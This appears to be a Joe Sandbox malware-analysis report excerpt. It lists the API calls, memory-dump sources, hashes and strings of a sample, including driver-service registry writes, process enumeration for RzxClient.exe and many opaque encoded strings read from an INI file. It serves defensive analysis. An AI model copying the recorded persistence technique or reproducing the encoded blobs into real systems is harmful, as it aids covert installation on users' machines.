                                                                                  • Instruction ID: c9b75bb3f2a5c5fa9cdf4e0b56275f5b24aa4ae01cb710e8240535c05d6d9b80
                                                                                  • Opcode Fuzzy Hash: cc4d28c8a6f7a50defdff56c37e41e414bbc04f38cbb21c955df2892dc812a89
                                                                                  • Instruction Fuzzy Hash: 2AF1B17150D7818FC310CF68C898B9BB7E5BF85318F054A2CE5A987291EF71E909CB92
                                                                                  APIs
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0BE9651F
                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0BE9652C
                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0BE96532
                                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0BE9655D
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965B2
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965C2
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965EE
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965FE
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0BE96628
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0BE96638
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                  • API String ID: 1599918012-2375825460
                                                                                  • Opcode ID: 05b0b542523610251de946db635f4321980fe13030569db33167d055695d45a6
                                                                                  • Instruction ID: 877314ab873336d5832d0dbe2b635e2e8bea4097d5b94e4133b933eaa86e6874
                                                                                  • Opcode Fuzzy Hash: 05b0b542523610251de946db635f4321980fe13030569db33167d055695d45a6
                                                                                  • Instruction Fuzzy Hash: 14317E71E0424ABEEF11DAE8DC85FEFB7BC9B08304F4051A2A144F2185D6B8DA588B51
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 0040D1C3
                                                                                  • _strlen.LIBCMT ref: 0040D1FE
                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,\*.*,?,?,00000000), ref: 0040D250
                                                                                  • FindNextFileA.KERNELBASE(?,000000FF,?,?,?,?,?), ref: 0040D3F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind_strlen$FirstNext
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 4205833381-1173974218
                                                                                  • Opcode ID: 2024ccbab966aa7f774a15eb63cb095ac0cccf6a4ed6097bf02bd11eab9da717
                                                                                  • Instruction ID: 992d8479d4ffef6459bdcea7b4e73b1348d7e0bb5d5532fddc05d23374fc6197
                                                                                  • Opcode Fuzzy Hash: 2024ccbab966aa7f774a15eb63cb095ac0cccf6a4ed6097bf02bd11eab9da717
                                                                                  • Instruction Fuzzy Hash: D1711EB1D00118DBDB14EF95DC85BEEB774AF44304F1081AEE50A77281EB389A84CF95
                                                                                  APIs
                                                                                  • OpenSCManagerA.SECHOST(00000000,00000000,000F003F,?,?,?,6A6E2BAA), ref: 6A6E26A0
                                                                                  • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26CF
                                                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26E0
                                                                                  • GetLastError.KERNEL32(?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26EA
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Service$Open$CloseErrorHandleLastManagerStart
                                                                                  • String ID:
                                                                                  • API String ID: 4248622755-0
                                                                                  • Opcode ID: 4b8f6c807d6c72219016f493ce2ba92736961acdddefa7746a1c60ae62a76bb8
                                                                                  • Instruction ID: 16a64fb800ef49bd46c0e380ba3fd4dae4b28e8b35b0494d55a35a753593d90f
                                                                                  • Opcode Fuzzy Hash: 4b8f6c807d6c72219016f493ce2ba92736961acdddefa7746a1c60ae62a76bb8
                                                                                  • Instruction Fuzzy Hash: 0D01C87338322527CE1115BE5C52BEB63D9AF83B63F1501A7F510D72418E42CC4969A4
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 0040D687
                                                                                  • _strlen.LIBCMT ref: 0040D6C2
                                                                                  • FindFirstFileA.KERNEL32(00000000,00000000,?,?,\*.*,?,?), ref: 0040D708
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$FileFindFirst
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 734317389-1173974218
                                                                                  • Opcode ID: 2ebb9f7fd4e0f89792f7cbb8a9fb1c2490d336e6616642f5d1a08ffbea32d0be
                                                                                  • Instruction ID: de38e4cd173a30c8edfa01adb7868d3bfde8b501e1eb6e5a615f5dffb6eec6dc
                                                                                  • Opcode Fuzzy Hash: 2ebb9f7fd4e0f89792f7cbb8a9fb1c2490d336e6616642f5d1a08ffbea32d0be
                                                                                  • Instruction Fuzzy Hash: 46512BB1D10118DBDB14EFA5DC41BEEB374AF54304F5085AAE50AB7281EB389E88CF85
                                                                                  APIs
                                                                                  • _strcpy_s.LIBCMT ref: 6A6EF38D
                                                                                    • Part of subcall function 6A701068: __getptd_noexit.LIBCMT ref: 6A701068
                                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 6A6EF3A5
                                                                                  • __snwprintf_s.LIBCMT ref: 6A6EF3DA
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 6A6EF415
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
                                                                                  • String ID: LOC
                                                                                  • API String ID: 1155623865-519433814
                                                                                  • Opcode ID: 707ee6d3bf3b40115295a3f8df3b670b693dd821ee0e1dbcb974e190aae7cc1f
                                                                                  • Instruction ID: 140711c8b5df28e5d05486591bd875044b8c053ebf795bf831c659cacc2272cf
                                                                                  • Opcode Fuzzy Hash: 707ee6d3bf3b40115295a3f8df3b670b693dd821ee0e1dbcb974e190aae7cc1f
                                                                                  • Instruction Fuzzy Hash: F221D5B1646308ABDB259A64EC49BD936FCAF02318F0144A1E204A7082DF748D498AA5
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 6A6DB005
                                                                                  • Process32First.KERNEL32(00000000,00000000), ref: 6A6DB030
                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 6A6DB069
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                                                  • String ID: RzxClient.exe
                                                                                  • API String ID: 1238713047-3752695696
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileInternetRead_memset
                                                                                  • String ID:
                                                                                  • API String ID: 707442687-0
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0BE9BA57
                                                                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 0BE9BA62
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0BE9BA7B
                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0BE9BA8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                  • String ID:
                                                                                  • API String ID: 2659516521-0
                                                                                  APIs
                                                                                  • _strcpy_s.LIBCMT ref: 0044CEF6
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000800,00000003,?,00000004), ref: 0044CF0F
                                                                                  • __snwprintf_s.LIBCMT ref: 0044CF43
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale__snwprintf_s_strcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 536295136-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: i D$i D
                                                                                  • API String ID: 0-2784904218
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0042FD62
                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0042FD7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00443ACC
                                                                                  • CallWindowProcA.USER32(?,?,?,?,?,?), ref: 00443AE2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallNtdllProcProc_
                                                                                  • String ID:
                                                                                  • API String ID: 1646280189-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID:
                                                                                  • API String ID: 431132790-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:

                                                                                  Control-flow Graph
                                                                                  • Function 405330-405e95 (edge listing omitted): a long chain of _strlen checks interleaved with calls to 404740 and 4068a0, followed by ks_setLicense, ks_setExtVal, _strncpy and ks_GetData
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_strncpyks_set$DataLicensePrivateProfileString_memcpy_s_memset
                                                                                  • String ID: 07328772bec783adedca0070972a0adcded8bf12a87b82263617ca94ca2eb6b7fdc6860184e49dfe495a731e479da9a4c41d$0aa072ae6fce7ede9171168b1e35fc7d76f14af922c891806138f801ec88f82d6daf34cf1ebe7945aad83982208f26e48a83$0ntNdj/aZGqOkbsjE+J5NyHG4hVg2ck9B+ioEU/oLxt9z6zhHySwqsVTAULFNDC/osCrgqCtHk5LFFK6$3164e14c9d421e976e3202f18d7a705ca32aea97f9b1566596d0a5829fe077e5c99aa2b398b241d5de4cd74954157d7cf383$3b0e4641e034a569748deca5c9b3df5a2b75e14041413481d09ffb16d4da79b4e0fbe607b47944383f7fc37c7da74c6a4d3a$4VBthGOalOGezbqH3Ke4C/pl9koUp/Q4OCABhn/EL2FzPc2BuK56eFEsvh5NscgiQP8+UCOX6WhyulFx$501XfFJZtEaJ6q6KmM5SeYb3ADXGjZ0eXjyzwWvHOGuT3L7Bg6QYCa8S84qGPKqIDBCMxZ4flvbzLlAg$64c909cfe4d7895b40534d37f0589810302a9b06bbbae0315947c8f0157be991bba67abe38556e15904c562d6d77b49c3a89$6T4siGu8JCVqvJg5vvX6SdaozyN/GAmF6+RZ5iV1EC97uA4gC3/eB1VmYqJPuq4l3C7Ts0nu8y487mj2$7AIIqqKK+3Z8uFPJrFUve9pkvl0lJQVSYkkucqtPizNTxDr7NTBIIvmmRcSWdauLN8TSUVBN4U1L0NPE$83367a5c965c70b81f3f7e6a525c8161cac96c8a4e1cf3f1ce9d05a831708f45415540c7c457b0fe6cffebbefc0c20825a45$AFhD658fA9uRMnb6kduQ85Az$AQJ1iKFmWWMVWbhOqMh9WKNB0OAAXpcb2Wu325xpM9/nDMV/FUn4VT1zkXJFDR/jpouQOhjwv5qcy2lK$BMxqtolupbMZfgrVR0otWPJyogBsNlfN6zwEae5exM5l1T8U+CURd8+8Nf45qRkKJ7/h1gFPw3EJPoue$BXNHQiZ+B6pBT9BAkXpXuwq+Wf5/3VQ1ittJZ2RMgnBcgHIdhvV9Dd677bs321nyAhsT5hvvxI43PsXe$C:\Users\user\Desktop\CFA702\D2EDCA7E\C8C6753\D74384.ini$EGk64TLkCdM62szhHWJSKSyAN/W0aeQoJwqx731f2dcKApXJ51l9jTUtnF4ac/CXHh1sI1Q+lzM5xotY$F3vxgjhzlyt+FDltR7tRLyukp5A+Mqr/mAs2Y4nF6EEBdwUnDwAHuuOwo9jAQH4JdKxZ9Pe9jqI2nz3n$KBrW+g83ikZwMVeCYlKanLeeDDuBxXgOc5C7WjgiSBe2uO33W5L4HGg2FLtRGQjj5JqS4n0yZPNUDDNA$KoRRE8cQt9Tr87pGb/+EpFv112w=$M/p0PnYuJ1sklDgSXDbgCx3kQxF+6a8ltoGzySfGm8Uz5h0+Xs3qIn8kyWLEwT5j+AxNplGn/ZQPwXHy$S81DHBOFXAtOopCTTymyU6eHrRxlKLjTYyY88gwg4yR+5QASfWzI5GGFipj+fjWp8cPRPNXNMroIinZm$T8Wsd6pb26L8L+WvsoCQYLMr3WuGSgooE1AMqVTHSrFWYWpn+h7BxafMQfmFWoLz/q7YHhyZ+nRrlLLQ$UpLkoBxj2c3RqU8IGLinqJbXLmdKlpdJfWfg7kxm81Ct6a2i/pqiM5
VlBfHtPr5lQ5v1VEtKQjPPIt7j$WGMzAij0BnIDtT3/uvwXIm+0AM9+kyGeyCZeUAZT0jvGZY/d8EWfYR4/HEpeIE848Xj2eMJeMyepFmDt$a08078fdd1b8ee251a2336bd2b711d05d37c9f6d33cc094fcfed4e00ec4339f70a48830018a644fc7cdd6524c42cdbf17f55$ad037f0e8d493ca45f9127cc1d4903821844255c204e194127e8ecf7e2c67f0bb10229f4667d1c3d59e1a93993bea1da8723$asDGH6anCrvdLwP1Mewi+HcOOSIdWA8SyM1GGd7AL2x/A3Hu1DMiawa1Ae+o4j3w988xiphDAinT+qsp$kOWXhifzg63RL6P0j+k2jO7rXp/0nZDqcmWgGo8Jgc5VGMA24JosN3s9/z0mWo7WyFHMPqlgdny35p4j$qG3069QzRf76mWFRP7BTzajbBgErgrW/v2fAclr6wZ7g8pmVHtkzDg+39t5dtHOEkPwt14rl9ZNgrZO6$vTHRmHdD18deM6PJKCOzBD4hYrXZ2KIMktaWmDeVuBa2PbgH6i/xsHB0fYFJ55/udx6kk18mfsyKEytr$wQf56+iPiWq0fD7ox38a0kLlSWpKeQSi22/otMleqUjTnfhO/yuNJdTDhT01AfRuPXh8yQi6T3bWmbL3
                                                                                  • API String ID: 2155493056-765598262
                                                                                  • Opcode ID: b3a6fbd18f382a5038def3076b72c7004ec26da9cd6f6e5ab41ffa114afa6eb0
                                                                                  • Instruction ID: 507b917843f7274eb67824c832b67a7afa611ab75f5494a7a22c77a93f9ef16a
                                                                                  • Opcode Fuzzy Hash: b3a6fbd18f382a5038def3076b72c7004ec26da9cd6f6e5ab41ffa114afa6eb0
                                                                                  • Instruction Fuzzy Hash: A1527FB1E142089BEB14FF51DC52BAE7275EB54308F20847FE50A76282EB7C9944CF5A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E1361
                                                                                  • RegOpenKeyA.ADVAPI32(80000002,?), ref: 6A6E1377
                                                                                  • RegCreateKeyA.ADVAPI32(80000002,?,00000000), ref: 6A6E138F
                                                                                  • RegCloseKey.ADVAPI32 ref: 6A6E139D
                                                                                  • RegSetValueExA.KERNELBASE ref: 6A6E13DD
                                                                                  • RegSetValueExA.KERNELBASE(?,ErrorControl,00000000,00000004,00000004,00000004), ref: 6A6E1404
                                                                                  • RegSetValueExA.KERNELBASE(?,Start,00000000,00000004,00000004,00000004), ref: 6A6E1427
                                                                                  • RegSetValueExA.KERNELBASE(?,DisplayName,00000000,00000002,?,?), ref: 6A6E144F
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6E145A
                                                                                  • RegSetValueExA.KERNELBASE(?,ImagePath,00000000,00000002,?,?), ref: 6A6E1499
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6E14A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$Close$CreateOpen_sprintf
                                                                                  • String ID: DisplayName$ErrorControl$Group$ImagePath$NDIS$Start$System\CurrentControlSet\Services\%s$Type
                                                                                  • API String ID: 440001231-2780834881
                                                                                  • Opcode ID: ca3ee53195914334e89791487664f40c44aa4cd50cc016789174810206762a47
                                                                                  • Instruction ID: 2e946ee28a4ab3a9a56e3f1f37a11b3632c62c75bff6445a454ff4bcb18f7015
                                                                                  • Opcode Fuzzy Hash: ca3ee53195914334e89791487664f40c44aa4cd50cc016789174810206762a47
                                                                                  • Instruction Fuzzy Hash: A85175B5608300BBE720DB64CC49FABB7E9AB88704F40891DB659D71C1EE74D904DB62

                                                                                  Control-flow Graph

